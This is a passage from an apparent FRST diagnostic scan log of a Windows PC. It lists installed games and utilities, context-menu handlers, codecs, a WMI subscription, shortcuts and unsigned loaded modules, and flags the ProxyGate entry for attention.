GameSpy Arcade (HKLM-x32\…\GameSpy Arcade) (Version:  - )
GetVideo (HKU\S-1-5-21-546064741-869659242-2245885051-1000\…\GetVideo) (Version:  - Online Center ltd)
GOG GALAXY (HKLM-x32\…\{7258BA11-600C-430E-A759-27E2C691A335}_is1) (Version:  - GOG.com)
Google Toolbar for Internet Explorer (HKLM-x32\…\{18455581-E099-4BA8-BC6B-F34B2F06600C}) (Version: 1.0.0 - Google Inc.) Hidden
Google Toolbar for Internet Explorer (HKLM-x32\…\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.8231.2252 - Google Inc.)
Google Update Helper (HKLM-x32\…\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.451 - Google LLC) Hidden
Google Update Helper (HKLM-x32\…\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.21.115 - Google Inc.) Hidden
Granblue Fantasy: Versus (HKLM-x32\…\Granblue Fantasy: Versus_is1) (Version:  - )
Grim Dawn Forgotten Gods (HKLM-x32\…\Grim Dawn Forgotten Gods_is1) (Version:  - )
Grim Dawn Item Assistant (HKLM\…\gdia_is1) (Version: 1.2.7485.27035 - )
GUILTY GEAR 2 OVERTURE (HKLM-x32\…\GUILTY GEAR 2 OVERTURE_is1) (Version:  - )
Guilty Gear Isuka (HKLM-x32\…\GOGPACKGGI_is1) (Version: 2.0.0.7 - GOG.com)
Guilty Gear X2 Reload (HKLM-x32\…\Guilty Gear X2 Reload_is1) (Version:  - GOG.com)
GUILTY GEAR Xrd REVELATOR (HKLM-x32\…\GUILTY GEAR Xrd REVELATOR_is1) (Version:  - )
GUILTY GEAR Xrd SIGN (HKLM-x32\…\GUILTY GEAR Xrd SIGN_is1) (Version:  - )
Guilty Gear Xrd: REV 2 (HKLM-x32\…\Guilty Gear Xrd: REV 2_is1) (Version:  - )
GUILTY GEAR XX ACCENT CORE PLUS R (HKLM-x32\…\R1VJTFRZR0VBUlhYQUNDRU5UQ09SRVBMVVNS_is1) (Version: 1 - )
GuiltyGearX (HKLM-x32\…\{11EAC7CB-9E4C-11D5-BC4E-0040053D9054}) (Version: 1.00.0000 - Cyberfront)
IL-2 Sturmovik: Cliffs of Dover (HKLM-x32\…\IL-2 Sturmovik: Cliffs of Dover_is1) (Version:  - )
Image Icon Converter 1.3 (HKLM-x32\…\Image Icon Converter_is1) (Version:  - JosesSoft, Inc.)
ImgBurn (HKLM-x32\…\ImgBurn) (Version: 2.5.8.0 - LIGHTNING UK!)
Impossible Creatures (HKLM-x32\…\1448280463_is1) (Version: 2.0.0.3 - GOG.com)
Injustice 2 (HKLM-x32\…\Injustice 2_is1) (Version:  - )
Injustice Gods Among Us Ultimate Edition version 1.0 u5 (HKLM-x32\…\Injustice Gods Among Us Ultimate Edition_is1) (Version: 1.0 u5 - Warner Bros.)
IObit Uninstaller 9 (HKLM-x32\…\IObitUninstall) (Version: 9.6.0.3 - IObit)
IrfanView 4.53 (64-bit) (HKLM\…\IrfanView64) (Version: 4.53 - Irfan Skiljan)
Java 8 Update 261 (64-bit) (HKLM\…\{26A24AE4-039D-4CA4-87B4-2F64180261F0}) (Version: 8.0.2610.12 - Oracle Corporation)
Java 8 Update 261 (HKLM-x32\…\{26A24AE4-039D-4CA4-87B4-2F32180261F0}) (Version: 8.0.2610.12 - Oracle Corporation)
Java(TM) SE Development Kit 14.0.1 (64-bit) (HKLM\…\{AF1122ED-203C-5CC1-8249-F85131C61AC4}) (Version: 14.0.1.0 - Oracle Corporation)
Jets'n'Guns 2 (HKLM-x32\…\Jets'n'Guns 2_is1) (Version:  - )
Kane's Wrath 1.2 (HKLM-x32\…\Command & Conquer 3: Kane's Wrath_is1) (Version:  - HWMasters.com)
Launcher Prerequisites (x64) (HKLM-x32\…\{43a03b9c-4770-409c-a999-587b60700b63}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Launcher Prerequisites (x64) (HKLM-x32\…\{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
League of Legends (HKLM-x32\…\League of Legends 1.0) (Version: 1.0 - Riot Games, Inc)
Legends of Runeterra (HKU\S-1-5-21-546064741-869659242-2245885051-1000\…\Riot Game bacon.live) (Version:  - Riot Games, Inc)
LibreOffice 6.1.3.2 (HKLM\…\{70F02214-8FF6-48DF-AF3E-7D1A5F7A6BAC}) (Version: 6.1.3.2 - The Document Foundation)
Magnifying Glass Pro 1.8 (HKLM-x32\…\Magnifying Glass Pro_is1) (Version: 1.8 - Workers Collection)
Malwarebytes version 3.6.1.2711 (HKLM\…\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.6.1.2711 - Malwarebytes)
MaskVPN (HKLM-x32\…\{4A4ACF2E-4A98-4D18-80E3-5A5E5706F81E}_is1) (Version: 1.1.0.31 - Global Media (Thailand) Co., Ltd)
Media Player Codec Pack 4.5.5 (HKLM-x32\…\Media Player - Codec Pack) (Version: 4.5.5 - Media Player Codec Pack)
Medieval II - Total War (HKLM-x32\…\Medieval II - Total War_is1) (Version:  - )
MegaTrainer XL V1.5.5.5-Beta (HKLM-x32\…\MegaTrainer XL_is1) (Version:  - )
Microsoft .NET Framework 1.1 (HKLM-x32\…\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}) (Version: 1.1.4322 - Microsoft)
Microsoft .NET Framework 4.7.2 (HKLM\…\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.7.03062 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\…\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\…\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\…\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\…\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\…\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\…\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\…\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\…\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\…\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\…\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\…\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\…\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\…\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\…\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\…\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\…\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.14.26429 (HKLM-x32\…\{80586c77-db42-44bb-bfc8-7aebbb220c00}) (Version: 14.14.26429.4 - Microsoft Corporation)
Microsoft Visual J# 2.0 Redistributable Package (HKLM-x32\…\Microsoft Visual J# 2.0 Redistributable Package) (Version:  - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\…\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Monster Train (HKLM-x32\…\Monster Train_is1) (Version:  - )
Mount and Blade (HKLM-x32\…\1207666893_is1) (Version: 2.0.0.4 - GOG.com)
MozBackup 1.5.1 (HKLM-x32\…\MozBackup) (Version:  - Pavel Cvrcek)
Mozilla Firefox 79.0 (x64 en-US) (HKLM\…\Mozilla Firefox 79.0 (x64 en-US)) (Version: 79.0 - Mozilla)
Mozilla Maintenance Service (HKLM\…\MozillaMaintenanceService) (Version: 58.0.2 - Mozilla)
MX5 (HKLM-x32\…\Maxthon5) (Version: 5.3.8.2000 - Maxthon International Limited)
Need for Speed Most Wanted (black edition) (HKLM-x32\…\Need for Speed Most Wanted (black edition)) (Version: 1.3 - Electronic Arts)
Need for Speed Underground 2 (HKLM-x32\…\Need for Speed Underground 2) (Version:  - )
Need for Speed World - Offline version 1.9.0 (HKLM-x32\…\{D7D24C8A-7B4D-4EDB-AF25-DC36D69B819B}_is1) (Version: 1.9.0 - SoapBox Race World)
Need for Speed™ The Run (HKLM-x32\…\{0EDC9BA0-016E-406a-86DA-04FC1BE00C21}) (Version: 1.0.0.0 - Electronic Arts)
Need for Speed™ Undercover (HKLM-x32\…\{E6D22FE1-AB5F-42CA-9480-6F70B96DDD88}) (Version: 1.0.1.0 - Electronic Arts)
NitroFamily (HKLM-x32\…\{008E8741-8888-4BEE-89B6-5AECB5FB9611}) (Version:  - )
NVIDIA PhysX (Legacy) (HKLM-x32\…\{FAAC26AD-73BA-40CE-86AA-C9213F9E064A}) (Version: 9.13.0604 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.15.0428 (HKLM\…\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation)
Octgn v3.4.286.0 (HKLM-x32\…\{33192AF0-3105-4BF1-B664-A9877E382B32}) (Version: 3.4.286.0 - OCTGN)
OpenAL (HKLM-x32\…\OpenAL) (Version:  - )
Othercide (HKLM-x32\…\Othercide_is1) (Version:  - )
Painkiller Black (HKLM-x32\…\Painkiller Black_is1) (Version:  - GOG.com)
Pale Moon 28.1.0 (x64 en-US) (HKLM\…\Pale Moon 28.1.0 (x64 en-US)) (Version: 28.1.0 - Moonchild Productions)
PCSX2 - Playstation 2 Emulator (HKLM-x32\…\pcsx2) (Version:  - )
Pillars of Eternity (HKLM-x32\…\1207666813_is1) (Version: 3.7.0.1280 - GOG.com)
Pillars of Eternity (HKLM-x32\…\Pillars of Eternity_is1) (Version:  - )
PowerISO (HKLM-x32\…\PowerISO) (Version: 7.0 - Power Software Ltd)
Praetorians Map Editor v.3.9.1 (HKLM-x32\…\Praetorians Map Editor v.3.9.1) (Version: v.3.9.1 - «AllGrey Modding» Corporation)
Prince of Persia (HKLM-x32\…\GOGPACKPOP2008_is1) (Version: 2.0.0.17 - GOG.com)
Prince of Persia The Forgotten Sands™ (HKLM-x32\…\{EAEAAF8C-8E86-4CAC-AC08-1A33EDCA34AC}) (Version: 1.0 - Ubisoft)
Prince of Persia The Sands of Time (HKLM-x32\…\GOGPACKPOP1_is1) (Version: 2.0.0.4 - GOG.com)
Prince of Persia The Two Thrones (HKLM-x32\…\GOGPACKPOPTTT_is1) (Version: 2.0.0.5 - GOG.com)
Prince of Persia Warrior Within (HKLM-x32\…\GOGPACKPOP2_is1) (Version: 2.0.0.9 - GOG.com)
ProtonVPN (HKLM-x32\…\{DD43CC6E-70A0-4739-A323-6255838B91FD}) (Version: 1.3.3 - ProtonVPN AG) Hidden
ProtonVPN (HKLM-x32\…\ProtonVPN 1.3.3) (Version: 1.3.3 - ProtonVPN AG)
Prototype (HKLM-x32\…\Prototype_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
ProxyGate version 3.0.0.1180 (HKLM-x32\…\{1EC095EE-8CA3-43D6-B9F5-0C55B82ED3D7}}_is1) (Version: 3.0.0.1180 - Gold Click Ltd) <==== ATTENTION
Realtek Ethernet Controller Driver (HKLM-x32\…\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.86.508.2014 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\…\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8581 - Realtek Semiconductor Corp.)
Recuva (HKLM\…\Recuva) (Version: 1.53 - Piriform)
Resonance of Fate 4K/HD Edition (HKLM-x32\…\Resonance of Fate 4K/HD Edition_is1) (Version:  - )
Rome - Total War - Alexander (HKLM-x32\…\{6C1804BC-094F-431A-BEA5-37A837958029}) (Version: 1.9 - The Creative Assembly)
Rome - Total War(TM) (HKLM-x32\…\{A642BB6B-CA1D-4142-8DD4-318C3F3DC834}) (Version: 1.0 - Activision) Hidden
Rome - Total War(TM) (HKLM-x32\…\InstallShield_{A642BB6B-CA1D-4142-8DD4-318C3F3DC834}) (Version: 1.0 - Activision)
Sacred Gold (HKLM-x32\…\Sacred Gold_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, markfiter)
SeaMonkey 2.49.1 (x86 en-US) (HKLM-x32\…\SeaMonkey 2.49.1 (x86 en-US)) (Version: 2.49.1 - Mozilla)
Skullgirls 2nd Encore (HKLM-x32\…\Skullgirls 2nd Encore_is1) (Version:  - )
Star wars Battlefront II version 1.3 (HKLM-x32\…\{2EF34761-F147-4984-8AF1-BB9F8DA76CDD}_is1) (Version: 1.3 - )
Starcraft (HKLM-x32\…\Starcraft) (Version:  - )
Steam (HKLM-x32\…\Steam) (Version: 2.10.91.91 - Valve Corporation)
Street Fighter 30th Anniversary Collection (HKLM\…\SKIDROW - Street Fighter 30th Anniversary Collection) (Version:  - SKIDROW)
Super Dragon Ball Heroes (HKLM-x32\…\Super Dragon Ball Heroes_is1) (Version:  - )
TAP-ProtonVPN 9.21.2 (HKLM\…\TAP-ProtonVPN) (Version: 9.21.2 - ProtonVPN AG)
The Battle for Middle-earth ™ II (HKLM-x32\…\{2A9F95AB-65A3-432c-8631-B8BC5BF7477A}) (Version:  - )
The King Of Fighters XIII (HKLM-x32\…\VGhlS2luZ09mRmlnaHRlcnNYSUlJ_is1) (Version: 1 - )
The Lord of the Rings, The Rise of the Witch-king (HKLM-x32\…\{B931FB80-537A-4600-00AD-AC5DEDB6C25B}) (Version:  - )
Tiberium Wars 1.09 (HKLM-x32\…\Command & Conquer 3: Tiberium Wars_is1) (Version:  - HWMasters.com)
Titan Quest Anniversary Edition Atlantis (HKLM-x32\…\Titan Quest Anniversary Edition Atlantis_is1) (Version:  - )
Tixati (HKLM-x32\…\tixati) (Version:  - )
Total Uninstaller version 3.3.0.161 (HKLM-x32\…\{A32F00F2-F342-4B23-A74B-D83B881D980B}_is1) (Version: 3.3.0.161 - Total Uninstaller, Inc.)
Ubisoft Game Launcher (HKLM-x32\…\{888F1505-C2B3-4FDE-835D-36353EBD4754}) (Version: 1.0.0.0 - UBISOFT)
Ultimate Marvel vs. Capcom 3 (HKLM-x32\…\Ultimate Marvel vs. Capcom 3_is1) (Version:  - )
Ultra Street Fighter IV (HKLM-x32\…\VWx0cmFTdHJlZXRGaWdodGVySVY=_is1) (Version: 1 - )
UNDER NIGHT IN BIRTH ExeLate clr (HKLM-x32\…\UNDER NIGHT IN BIRTH ExeLate clr_is1) (Version:  - )
UNDER NIGHT IN-BIRTH (HKLM-x32\…\UNDER NIGHT IN-BIRTH_is1) (Version:  - )
Virtual Magnifying Glass v3.6 (HKLM-x32\…\Virtual Magnifying Glass_is1) (Version:  - )
Vivaldi (HKU\S-1-5-21-546064741-869659242-2245885051-1000\…\Vivaldi) (Version: 2.10.1745.27 - Vivaldi Technologies AS.)
VLC media player (HKLM\…\VLC media player) (Version: 3.0.8 - VideoLAN)
Vulkan Run Time Libraries 1.1.70.0 (HKLM\…\VulkanRT1.1.70.0) (Version: 1.1.70.0 - LunarG, Inc.) Hidden
War of the Ring™ (HKLM-x32\…\War of the Ring) (Version: 1.0 - Sierra Entertainment, Inc.)
Warcraft 3 The Frozen Throne v1.29 version 1.00 (HKLM-x32\…\{198FE745-6834-5554-B5D4-54AD87C2445D}_is1) (Version: 1.00 - )
Warhammer Battle March (HKLM-x32\…\{ABC91C39-266D-4042-828E-4386E0F25218}) (Version: 2.0.0 - Namco Bandai Games)
Warhammer Mark of Chaos (HKLM-x32\…\{5F374D5D-DB43-4263-9C29-BAB2C93FEFE6}) (Version: 1.006.000 - NAMCO BANDAI Games)
Waterfox Classic 56.3 (x64 en-US) (HKLM\…\Waterfox Classic 56.3 (x64 en-US)) (Version: 56.3 - Waterfox Ltd)
Web Companion (HKLM-x32\…\{79cfde76-aac6-4c6d-96c1-fa765f5f048c}) (Version: 4.9.2159.4024 - Lavasoft)
WeMod (HKU\S-1-5-21-546064741-869659242-2245885051-1000\…\WeMod) (Version: 6.3.10 - WeMod)
Winamp (HKLM-x32\…\Winamp) (Version: 5.666  - Nullsoft, Inc)
WinRAR 5.50 (64-bit) (HKLM\…\WinRAR archiver) (Version: 5.50.0 - win.rar GmbH)
XFast LAN v9.05 (HKLM\…\XFast LAN) (Version: 9.05 - cFos Software GmbH, Bonn)
ZombsRoyale.io (HKU\S-1-5-21-546064741-869659242-2245885051-1000\…\519338998791929866) (Version:  - )
ZoneAlarm Anti-Ransomware (HKLM-x32\…\{0B8C3231-9818-4CB9-8213-4AB839836791}) (Version: 1.002.1006 - Check Point Software) Hidden
ZoneAlarm Firewall (HKLM-x32\…\{2F77A309-CAB9-4C8A-8ED0-8C8DA3FF0744}) (Version: 15.8.038.18284 - Check Point Software Technologies Ltd.) Hidden
ZoneAlarm Free Firewall (HKLM-x32\…\ZoneAlarm Free Firewall) (Version: 15.8.038.18284 - Check Point)
ZoneAlarm Security (HKLM-x32\…\{DA17D180-7193-4070-B085-9827DB80C2F8}) (Version: 15.8.038.18284 - Check Point Software Technologies Ltd.) Hidden

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-546064741-869659242-2245885051-1000_Classes\CLSID\{BCA9D37C-CA60-4160-9115-97A00F24702D}\localserver32 -> C:\Users\Ohm\AppData\Local\Vivaldi\Application\2.10.1745.27\notification_helper.exe (Vivaldi Technologies AS -> Vivaldi Technologies AS)
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2018-04-30] (Igor Pavlov) [File not signed]
ContextMenuHandlers1: [Advanced SystemCare] -> {2803063F-4B8D-4dc6-8874-D1802487FE2D} => C:\Program Files (x86)\IObit\Advanced SystemCare\ASCExtMenu_64.dll [2019-09-19] (IObit Information Technology -> IObit)
ContextMenuHandlers1: [IObitUnstaler] -> {836AB26C-2DE4-41D3-AC24-4C6C2699B960} => C:\Program Files (x86)\IObit\IObit Uninstaller\IUMenuRight.dll [2020-07-08] (IObit Information Technology -> IObit)
ContextMenuHandlers1: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2017-10-24] (Power Software Ltd) [File not signed]
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers2: [Advanced SystemCare] -> {2803063F-4B8D-4dc6-8874-D1802487FE2D} => C:\Program Files (x86)\IObit\Advanced SystemCare\ASCExtMenu_64.dll [2019-09-19] (IObit Information Technology -> IObit)
ContextMenuHandlers2: [DaemonShellExtDriveLite] -> {C06369D6-E77D-4626-9656-1256312BD576} => C:\Program Files\DAEMON Tools Lite\dtshl64.dll [2020-01-06] (AVB Disc Soft, SIA -> Disc Soft Ltd)
ContextMenuHandlers3: [DaemonShellExtImageLite] -> {1D1B5D7B-0FC9-452E-902C-12BACD4FBC20} => C:\Program Files\DAEMON Tools Lite\dtshl64.dll [2020-01-06] (AVB Disc Soft, SIA -> Disc Soft Ltd)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-09-19] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2018-04-30] (Igor Pavlov) [File not signed]
ContextMenuHandlers4: [Advanced SystemCare] -> {2803063F-4B8D-4dc6-8874-D1802487FE2D} => C:\Program Files (x86)\IObit\Advanced SystemCare\ASCExtMenu_64.dll [2019-09-19] (IObit Information Technology -> IObit)
ContextMenuHandlers4: [IObitUnstaler] -> {836AB26C-2DE4-41D3-AC24-4C6C2699B960} => C:\Program Files (x86)\IObit\IObit Uninstaller\IUMenuRight.dll [2020-07-08] (IObit Information Technology -> IObit)
ContextMenuHandlers4: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2017-10-24] (Power Software Ltd) [File not signed]
ContextMenuHandlers4: [RecuvaShellExt] -> {435E5DF5-2510-463C-B223-BDA47006D002} => C:\Program Files\Recuva\RecuvaShell64.dll [2016-06-06] (Piriform Ltd -> Piriform Ltd)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\AMD\CNext\CNext\atiacm64.dll [2019-03-12] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2018-04-30] (Igor Pavlov) [File not signed]
ContextMenuHandlers6: [IObitUnstaler] -> {836AB26C-2DE4-41D3-AC24-4C6C2699B960} => C:\Program Files (x86)\IObit\IObit Uninstaller\IUMenuRight.dll [2020-07-08] (IObit Information Technology -> IObit)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-09-19] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers6: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2017-10-24] (Power Software Ltd) [File not signed]
ContextMenuHandlers6: [RecuvaShellExt] -> {435E5DF5-2510-463C-B223-BDA47006D002} => C:\Program Files\Recuva\RecuvaShell64.dll [2016-06-06] (Piriform Ltd -> Piriform Ltd)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)

==================== Codecs (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\…\Drivers32: [VIDC.FPS1] => C:\Windows\system32\frapsv64.dll [71680 2012-08-30] (Beepa P/L) [File not signed]
HKLM\…\Drivers32: [VIDC.FPS1] => C:\Windows\SysWOW64\frapsvid.dll [65536 2012-08-30] (Beepa P/L) [File not signed]
HKLM\…\Drivers32: [vidc.xvid] => C:\Windows\SysWOW64\xvidvfw.dll [235520 2017-12-08] () [File not signed]
HKLM\…\Drivers32: [vidc.x264] => C:\Windows\SysWOW64\x264vfw.dll [3850240 2017-07-30] (x264vfw project) [File not signed]
HKLM\…\Drivers32: [vidc.lags] => C:\Windows\SysWOW64\lagarith.dll [230080 2016-09-21] (Cole Williams Software Limited -> )
HKLM\…\Drivers32: [msacm.divxa32] => C:\Windows\SysWOW64\DivXa32.acm [291408 2013-12-17] (Packed With Joy !) [File not signed]

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)

WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
Shortcut: C:\Users\Ohm\Desktop\ALL!\ALL GG!\GAMES!!\GUILTY GEAR Xrd REVELATOR.lnk -> E:\StallInGGrade!\BEAUTIFUL BRAWLING BASTARDS!\GUILTY GEAR GENERATION!\GUILTY GEAR Xrd REVELATOR\BootGGXrd.bat ()
Shortcut: C:\Users\Ohm\Desktop\ALL!\ALL GG!\GAMES!!\GUILTY GEAR Xrd SIGN.lnk -> E:\StallInGGrade!\BEAUTIFUL BRAWLING BASTARDS!\GUILTY GEAR GENERATION!\GUILTY GEAR Xrd SIGN\BootGGXrd.bat ()
Shortcut: C:\Users\Ohm\Desktop\ALL!\ALL GG!\BRAWL!\GUILTY GEAR Xrd REVELATOR.lnk -> E:\StallInGGrade!\BEAUTIFUL BRAWLING BASTARDS!\GUILTY GEAR GENERATION!\GUILTY GEAR Xrd REVELATOR\BootGGXrd.bat ()
Shortcut: C:\Users\Ohm\Desktop\ALL!\ALL GG!\BRAWL!\GUILTY GEAR Xrd SIGN.lnk -> E:\StallInGGrade!\BEAUTIFUL BRAWLING BASTARDS!\GUILTY GEAR GENERATION!\GUILTY GEAR Xrd SIGN\BootGGXrd.bat ()
Shortcut: C:\Users\Ohm\Desktop\ALL!\ALL GG!\AALL BATCH!\2nd!\GUILTY GEAR Xrd REVELATOR.lnk -> E:\StallInGGrade!\BEAUTIFUL BRAWLING BASTARDS!\GUILTY GEAR GENERATION!\GUILTY GEAR Xrd REVELATOR\BootGGXrd.bat ()
Shortcut: C:\Users\Ohm\Desktop\ALL!\ALL GG!\AALL BATCH!\2nd!\GUILTY GEAR Xrd SIGN.lnk -> E:\StallInGGrade!\BEAUTIFUL BRAWLING BASTARDS!\GUILTY GEAR GENERATION!\GUILTY GEAR Xrd SIGN\BootGGXrd.bat ()

==================== Loaded Modules (Whitelisted) =============

2018-02-08 12:04 - 2012-08-28 17:54 - 000114688 _____ () [File not signed] C:\Program Files (x86)\ASUS\USB-N10 WLAN Card Utilities\EnumDevLib.dll
2019-11-04 15:09 - 2019-11-04 15:09 - 000059392 _____ () [File not signed] C:\Program Files (x86)\CheckPoint\Endpoint Security\Threat Emulation\SA\dict-vectorizer.dll
2018-12-20 17:11 - 2018-12-20 17:11 - 000014336 _____ () [File not signed] C:\Program Files\AMD\CNext\CNext\libEGL.DLL
2018-12-20 17:11 - 2018-12-20 17:11 - 002551808 _____ () [File not signed] C:\Program Files\AMD\CNext\CNext\libGLESv2.dll
2019-11-27 11:18 - 2019-11-27 11:18 - 000067072 _____ (Check Point Software Technologies Ltd.) [File not signed] C:\Program Files (x86)\CheckPoint\Endpoint Security\EFR\cphnt64.dll
2019-11-27 11:18 - 2019-11-27 11:18 - 000019968 _____ (Check Point Software Technologies Ltd.) [File not signed] C:\Program Files (x86)\CheckPoint\Endpoint Security\EFR\cphusr64.dll
2018-10-20 18:39 - 2018-04-30 15:00 - 000075776 _____ (Igor Pavlov) [File not signed] C:\Program Files\7-Zip\7-zip.dll
2018-03-26 13:58 - 2018-03-26 13:58 - 000112128 _____ (Microsoft Corporation) [File not signed] [File is in use] C:\Windows\Microsoft.Net\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll
2020-01-20 22:16 - 2020-01-20 22:16 - 000986112 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\CheckPoint\ZoneAlarm\dbghelp.dll
2017-10-24 05:38 - 2017-10-24 05:38 - 000311808 _____ (Power Software Ltd) [File not signed] C:\Program Files\PowerISO\PWRISOSH.DLL
2018-02-08 12:04 - 2012-09-27 15:39 - 000630272 _____ (Realtek Semiconductor Corp.) [File not signed] C:\Program Files (x86)\ASUS\USB-N10 WLAN Card Utilities\RtlLib.dll
2018-02-08 12:04 - 2009-01-21 12:33 - 000200704 _____ (Realtek) [File not signed] C:\Program Files (x86)\ASUS\USB-N10 WLAN Card Utilities\IpLib.dll
